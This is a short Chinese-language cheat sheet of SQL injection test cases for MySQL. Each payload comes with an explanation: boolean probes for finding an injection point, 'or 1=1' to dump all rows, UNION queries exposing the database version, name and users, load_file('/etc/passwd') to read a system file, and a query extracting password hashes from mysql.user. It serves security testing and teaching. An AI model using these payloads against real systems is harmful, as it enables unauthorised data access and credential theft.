SQL注入攻擊測試用例 | 說明 |
Night
Night’ and 1=1#
Night’ and 1=2# | 判斷注入點。第一次是正常請求,如果存在注入漏洞,那么第二次請求得到結果應該與第一次一樣,并且第三次請求得到的結果應該與前兩次不同 |
Night’ or 1=1# | 返回所有數據,常用于有搜索功能的頁面 |
Night’ union select version()# | 返回數據庫版本信息 |
Night’ union select database()# | 返回當前的庫名 |
Night’ union select user()# | 返回數據庫的用戶名信息 |
Night’ union select session_user()# |
Night’ union select system_user()# |
Night’ union select load_file(‘/etc/passwd’)# | 讀取系統文件 |
Night’ select user ,password from mysql.user# | 返回數據庫用戶的密碼信息,密碼一般以MD5的方式存放 |